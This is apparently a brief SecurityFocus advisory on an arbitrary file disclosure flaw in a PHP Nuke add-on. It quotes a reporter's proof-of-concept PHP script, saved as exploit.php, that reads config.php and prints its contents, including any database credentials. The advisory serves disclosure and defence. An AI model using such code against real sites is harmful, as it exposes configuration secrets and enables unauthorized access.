PHP Nuke AddOn Arbitrary File Disclosure Vulnerability

<supergate@twlc.net> submitted these steps for reproducing this vulnerability:

If I put something like this:

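<?php
// Read config.php from the same directory into an array of lines.
$db = "config.php";
$fdb = @file($db);
// Start at the last valid index (count - 1); file() returns false on failure.
$ldb = is_array($fdb) ? count($fdb) - 1 : -1;
// Print the lines from last to first.
while ($ldb >= 0) {
    echo $fdb[$ldb];
    $ldb--;
}
?>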

and name it exploit.php and put it in the main directory? It simply allowed me to read config.php.


 

Copyright 2010, SecurityFocus